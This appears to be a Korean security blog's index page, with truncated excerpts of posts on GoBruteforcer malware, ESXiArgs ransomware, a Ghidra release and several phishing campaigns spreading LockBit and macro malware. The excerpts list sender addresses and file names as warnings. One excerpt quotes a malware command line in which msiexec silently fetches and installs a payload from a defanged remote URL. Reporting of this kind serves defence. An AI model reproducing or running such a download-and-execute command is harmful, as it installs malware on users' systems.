태군 코드 : Security, travel & communication

GoBruteforcer 라고 불리는 새로운 Golang 기반 멀웨어가 phpMyAdmin, MySQL, FTP 및 Postgres를 실행하는 웹 서버를 대상으로 장치를 봇넷으로 몰아넣는 것으로 발견되었습니다. Palo Alto Networks Unit 42의 연구원들은 "GoBruteforcer는 공격 중에 네트워크를 스캔하기 위해 CIDR (Classless Inter-Domain Routing) 블록을 선택했으며 해당 CIDR 범위 내의 모든 IP 주소를 표적으로 삼았습니다." 라고 밝혔습니다 . "공격자는 단일 IP 주소를 대상으로 사용하는 대신 네트워크 내의 서로 다른 IP에 있는 광범위한 대상 호스트에 액세스하는 방법으로 CIDR 블록 스캐닝을 선택했습니다." GoBruteforcer는 주로 ..

ESXi Args 랜섬웨어 발발로 1,000대 이상의 서버에 영향 2월 3일, CERT-FR 은 ESXi Args 랜섬웨어를 배포하기 위해 VMware ESXi 서버를 대상으로 하는 랜섬웨어 공격에 대해 사용자에게 경고 했습니다. 이 보고서는 또한 TA(Threat Actors)가 CVE-2021-21974 로 추적된 2년 된 취약점을 활용한다고 밝혔 습니다. VMware에 따르면 ESXi70U1c-17325551 이전의 ESXi 버전 7.0, ESXi670-202102401-SG 이전의 6.7 및 ESXi650-202102101-SG 이전의 6.5에는 OpenSLP의 힙 오버플로우 취약점이 포함되어 있습니다. 포트 427에 액세스할 수 있는 ESXi 시스템과 동일한 네트워크에 있는 TA는 이 취약점을 ..

입사지원서를 위장한 LockBit 랜섬웨어가 지속적으로 탐지되고 있습니다. 해당 악성메일은 zip 파일로 압축이 되어 있고 비밀번호가 설정되어 있어 보안장비를 우회할 수 있습니다. 발신자 : marylandleisy396@gmail.com (변경될수 있음) 제목 : 열정적이고 유능한 사람 (변경될수 있음) 첨부파일 : 비밀번호가 설정되어 있는 zip 압축 파일 발신자 주소 (변경될수 있음) tsukokunakino@gmail.com nankonshin@gmail.com campbellisnsf@gmail.com whitenzjqy@gmail.com td9202544@gmail.com hysjame97@gmail.com leettrxv@gmail.com marylandleisy396@gmail.com ha..

최근 타켓형 악성메일과 특정 기업을 사칭한 악성메일이 꾸준히 발생을 하고 있으므로, 사용자들의 주의가 필요할것으로 보입니다. 발신자 : doaa.shaban@ten.tv (지속적으로 변경되고 있음) 제목 : 통보 76386154-20191203 (변경가능) 첨부파일명 : 통보 76386154-20191203.doc (변경가능) 해당 메일확인시 통보 (임의숫자).doc 파일을 포함하고 있으며, 본문에는 업무성 메일로 위장을 하고 있어 사용자가 첨부파일을 열도록 유도를 하고 있습니다. 문서를 열경우 파워쉘을 이용하여 악성파일을 다운로드 받으며, 해당 악성파일은 추가로 외부와통신을 하여 추가 악성행위를 수행하도록 설정되어 있습니다. filename: C:\Users\admin\105.exe md5: 48ca1..

입사지원서를 위장한 악성메일이 지속적으로 유포가 되고 있습니다. 해당 악성메일은 첨부파일에 있는 확장자를 긴 문자열로 위장하여 보내고 있으며, 현재 다수의 백신에서 탐지가 안되고 있어 더욱 주의가 필요할 것으로 확인이 됩니다. 발신자 : b8524868@hanmail.net제목 : 김기홍 지원서첨부파일명 : 김기홍.7z 메일의 본문 내용을 보시면 입사지원서를 위장하고 있으며, 메일의 헤더를 변조하여 악성 메일을 유포하고 있습니다. 위에서도 보이듯이 발신자와 수신자가 동일한 것을 확인 할수 있습니다. 첨부파일에 내용을 보면 이력서.pdf, 포트폴리오.pdf 로 포함되고 있는것 처럼 보이지만 실제 파일제목 부분을 늘려보면 실행파일인것을 확인할수가 있습니다. 바이러스토탈 확인시 다수의 백신에서 탐지는 하고 있..

국세청을 위장한 악성메일이 추가로 발견 되었습니다. 발신자 : david@mustix.com 외 다수 제목 : 국세청송장, 송장, 과세 요청 외 다수 첨부파일명 : eTaxInvoice_654281.html (변경될수 있음) 메일의 본문을 살펴보면 기존과는 다르게 html 파일을 첨부하고 있으며, 보안장비를 우회하려는 것으로 보입니다. 첨부된 html 파일의 내용입니다. 첨부파일 실행시 특정 URL을 호출하여 기존과 동일한 매크로 형태의 엑셀 파일을 다운로드 받게 이루어져 있습니다. 확일결과 해당 메일은 정보탈취형 악성코드로 확인이 되며 메일 실행 절차는 다음과 같습니다. 1. 국세청을 사칭한 첨부된 html 파일 실행 2. 특정 URL로 연결되어 다운로드 경고창 발생 다운로드 실행시 악성 매크로가 포함..

엑셀파일(.xls)을 포함한 악성메일이 지속적으로 증가하고 있어 사용자들의 각별한 주의가 필요할 것으로 보입니다. 발신자 : alva.kao@psamc.com 외 다수제목 : 초대첨부파일 : 973F68.xls (임의의 숫자) 메일 본문 내용은 국세법을 위반하였으니 피고인 자격으로 국세청에 출두해야 된다는 내용이 포함되어 있으며, 사용자가 첨부파일을 열어보도록 유도를 하고 있습니다. 첨부파일을 실행하면 다음과 같은 화면이 뜨면서 상단부분에 콘텐츠 사용하기라는 버튼이 표시 됩니다. 콘텐츠 사용하기 버튼을 누를경우 매크로가 실행되면서 악성코드 유포지로 접속을하여 특정파일을 내려받아 악성행위를 수행하고 있습니다. 악성행위 순서#10x9c8excel.exe"C:\Program Files\Microsoft Off..

발신자 : paraic.hickey@dunbarlunn.com 외 다수 제목 : 서류 첨부파일명 : 1333327437141.xls (숫자 변경) 해당 메일은 본문내용 없이 '삼성 갤럭시 스마트폰에서 보냈습니다.'라는 문구와 숫자로 된 엑셀파일이 첨부되어 있습니다. 첨부된 엑셀 파일을 실행시키면 엑셀창이 뜨면서 '콘텐츠 사용' 이라는 보안경고 창이 활성화 되고 매크로 사용을 유도 하고 있습니다. 보안 경고를 무시하고 '콘텐츠 사용'을 누를경우 매크로를 수행해 외부로 부터 악성코드가 다운로드 됩니다. "msiexec.exe" with commandline "RESTART=AUTO /i hxxp://velquene.net/mshost1 /q ADRESS='%TMP%'" 현재 다수의 백신에서 미탐지 중이며, ..

최근 온라인 팩스 서비스 WiseFax를 사칭하여 악성메일이 유포되고 있어 주의가 필요할것으로 보입니다. 발신자 : admin@eurocoin.info 외 다수제목 : 팩스가 전송되었습니다.첨부파일 : WiseFax 문서.rar 해당 메일은 '팩스가 전송되었습니다.'란 제목과 'WiseFax 문서.rar' 파일을 함께 첨부하고 있으며, 본 서류를 보기 위해서는 MS워드가 필요하다는 내용을 담고 있습니다. 실제 해당 첨부파일을 확인해보면 doc 파일을 위장한 실행파일이 담겨져 있습니다. WiseFax는 실제로 존재하고 있는 온라인 팩스 어플리케이션으로 공격자들은 실제 존재하는 제품을 사칭해 사용자들을 안심시킨뒤 첨부파일 실행을 유도하고 있습니다. 최근 유포되고 있는 악성메일들의 유형을 보면 지속적으로 변화..

미국 NSA가 내부적으로 개발하고 사용했던 리버스 엔지니어링 툴인 기드라(Ghidra)가 소스코드까지 공개가 되었습니다. 공개가 된지는 조금되었지만... 기드라는 리버스 엔지니어링 프레임워크로 NSA 보안 연구 부서에서 개발한 툴들로 구성되어 있으며, 악성코드와 멀웨어를 분석할수 있는 도구 있습니다. 현재 윈도우, 맥, 리눅스 등 다양한 OS에서 호환이 됩니다. 현재 IDA 디버깅 툴을 너무 비싸서 사용을 못하지만, IDA를 대체할수 있는게 Ghidra라고 조심스럽게 생각해 봅니다. 기드라(Ghidra) 다운로드 해당 사이트에 가시면 기드라를 다운로드 받을수 있으며 보다 자세한 정보가 나와있으니 참고하셔서 한번 사용해보셔도 좋을 것 같습니다.